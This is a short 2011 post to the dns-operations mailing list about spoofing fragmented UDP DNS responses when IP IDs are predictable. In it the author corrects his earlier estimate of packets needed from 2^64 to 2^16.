[dns-operations] .fr has 5 DNSKEYs

George Barwood george.barwood at blueyonder.co.uk
Wed Jun 1 20:55:47 UTC 2011


I wrote:

> Fragmented UDP responses are especially vulnerable to spoofing, because
> of the way IP fragmentation works. The DNS ID field (and UDP source port)
> is only present in the first fragment, so by sending a spoof non-first fragments
> an attacker that can predict the IP ID ( which might be possible depending
> on the underlying IP implementation ) may be able to spoof a response with
> a single or very low number of packets, or in any case using ~2^64 packets.

Sorry, that should be 2^16 packets of course. Senility setting in I'm afraid,
I have no idea how I managed to write that.


More information about the dns-operations mailing list